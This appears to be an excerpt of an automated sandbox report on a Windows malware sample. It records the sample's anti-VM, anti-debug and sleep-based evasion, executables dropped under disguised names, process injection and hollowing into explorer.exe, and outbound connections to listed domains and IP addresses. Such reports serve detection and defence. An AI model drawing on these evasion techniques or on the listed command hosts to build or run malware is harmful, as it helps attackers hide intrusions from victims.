Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: rrjthgj, 00000004.00000002.448804117.000000000055A000.00000004.00000020.00020000.00000000.sdmp, C2B9.exe, 00000013.00000002.476281911.00000000006DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: file.exe, 00000000.00000002.379778973.00000000007C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK;

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrjthgj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrjthgj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrjthgj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrjthgj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrjthgj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrjthgj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C2B9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\C2B9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\C2B9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\C2B9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\C2B9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\C2B9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Source: C:\Windows\explorer.exe TID: 3544	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6C74.exe TID: 7436	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 4900	Thread sleep count: 151 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 4900	Thread sleep time: -33975s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe TID: 7548	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\759F.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_5-16672

Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 415	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 379	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 436	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 740	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 735	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Dropped PE file which has not been started: C:\Users\user\Downloads\ChromeSetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Dropped PE file which has not been started: C:\Users\user\Downloads\ChromeSetup.exe.bhui (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\XandETC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aafg31.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E9C7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oldplayer.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\759F.exe

Code function: 5_2_023016FC rdtsc

5_2_023016FC

Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\759F.exe

5_2_00404AB0

Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Source: 86ED.exe, 0000001B.00000002.479544500.00000000006D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWort (IPv6)-QoS Packet Scheduler-0000W
Source: 6C74.exe, 00000018.00000002.618961706.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW !
Source: 86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: explorer.exe, 00000001.00000000.370943136.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: 759F.exe, 00000006.00000002.450044131.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000006.00000002.450044131.0000000000687000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000003.449851407.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000002.457202907.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000002.457202907.0000000000647000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000002.503214555.000000000099C000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000003.500060099.000000000099C000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000002.503130852.0000000000942000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000002.455817326.00000000007A1000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000002.455706179.000000000073F000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000003.454348016.00000000007A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.367087755.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000001.00000000.370943136.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000001.00000000.370943136.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000001.00000000.370943136.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: 759F.exe, 00000006.00000002.450044131.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,
Source: explorer.exe, 00000001.00000000.365001996.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: 759F.exe, 00000006.00000002.450044131.00000000006D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 9B15.exe, 0000001A.00000002.480583823.0000000000927000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.370943136.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
Source: 759F.exe, 00000006.00000002.450044131.00000000006D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.370943136.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: 6C74.exe, 0000000C.00000002.457202907.0000000000647000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy
Source: 6C74.exe, 0000000C.00000002.457202907.0000000000647000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy\|%;

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrjthgj	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C2B9.exe	System information queried: CodeIntegrityInformation

Source: C:\Users\user\AppData\Local\Temp\759F.exe

Code function: 5_2_00404E80 LoadLibraryW,GetProcAddress,VirtualProtect,

5_2_00404E80

Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_0065092B mov eax, dword ptr fs:[00000030h]	4_2_0065092B
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_00650D90 mov eax, dword ptr fs:[00000030h]	4_2_00650D90
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_01FE61DA push dword ptr fs:[00000030h]	4_2_01FE61DA
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_02300083 push dword ptr fs:[00000030h]	5_2_02300083

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrjthgj	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C2B9.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\759F.exe

Code function: 5_2_0040983D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

5_2_0040983D

Source: C:\Users\user\AppData\Local\Temp\759F.exe

Code function: 5_2_023016FC rdtsc

5_2_023016FC

Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe

Memory protected: page guard

Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_0040983D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040983D
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_004091F8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_004091F8
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_0040F98D SetUnhandledExceptionFilter,	5_2_0040F98D
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_0040BAF2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040BAF2
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_00404AB0 SetCommTimeouts,PurgeComm,ClearCommError,FindVolumeClose,LoadLibraryA,GetProfileIntW,ReadConsoleInputW,GetProfileIntW,VirtualQuery,GetLogicalDriveStringsW,SetUnhandledExceptionFilter,GetVolumePathNameW,FindVolumeClose,	5_2_00404AB0
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_004066E3 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_004066E3

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: toobussy.com
Source: C:\Windows\explorer.exe	Network Connect: 37.34.248.24 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 123.140.161.243 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 80.66.203.53 443	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: colisumy.com
Source: C:\Windows\explorer.exe	Domain query: astoriaresidency.com
Source: C:\Windows\explorer.exe	Network Connect: 211.168.53.110 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: potunulit.org
Source: C:\Windows\explorer.exe	Network Connect: 190.219.153.101 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 187.251.132.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.9.74.80 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.233.24.19 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.7 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 177.254.85.20 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 211.119.84.112 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: shsplatform.co.uk
Source: C:\Windows\explorer.exe	Network Connect: 190.224.203.37 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 189.143.161.89 80	Jump to behavior

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: E8B1.exe.1.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrjthgj	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrjthgj	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C2B9.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\C2B9.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\759F.exe	Memory written: C:\Users\user\AppData\Local\Temp\759F.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Memory written: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Memory written: C:\Users\user\AppData\Local\Temp\6C74.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Memory written: C:\Users\user\AppData\Local\Temp\759F.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\AF5C.exe	Memory written: C:\Users\user\AppData\Local\Temp\AF5C.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Memory written: C:\Users\user\AppData\Local\Temp\6C74.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\9B15.exe	Memory written: C:\Users\user\AppData\Local\Temp\9B15.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\86ED.exe	Memory written: C:\Users\user\AppData\Local\Temp\86ED.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\E8B1.exe	Memory written: C:\Users\user\AppData\Local\Temp\E8B1.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Memory written: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\6000.exe	Memory written: C:\Users\user\AppData\Local\Temp\6000.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Memory written: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Memory written: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe base: 400000 value starts with: 4D5A

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: 3851B14	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rrjthgj	Thread created: unknown EIP: 5851B14	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C2B9.exe	Thread created: unknown EIP: 5A319C0

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe

Section unmapped: unknown base address: 400000

Writes to foreign memory regions

Source: C:\Windows\System32\consent.exe

Memory written: C:\Windows\System32\svchost.exe base: A09C67EA28

Source: explorer.exe, 00000001.00000000.364386289.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000001.00000000.370943136.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.364386289.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.367044744.0000000006770000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.364386289.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.364209928.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000001.00000000.364386289.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	5_2_0041206C
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	5_2_00415036
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	5_2_00412998
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: GetLocaleInfoA,	5_2_00421A50
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	5_2_00414AB1
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	5_2_00414BC8
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	5_2_00412C5E
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	5_2_00414C60
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	5_2_0041A414
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	5_2_00414CD4
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: GetLocaleInfoW,	5_2_00422CD7
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	5_2_00422CF0
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,	5_2_00422D24
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	5_2_00422E63
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	5_2_00414EA6
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: EnumSystemLocalesA,	5_2_00414F69
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,	5_2_0041270D
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_00414FFA
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_00414F93
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: GetLocaleInfoA,	5_2_004217BC

Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Queries volume information: C:\ VolumeInformation
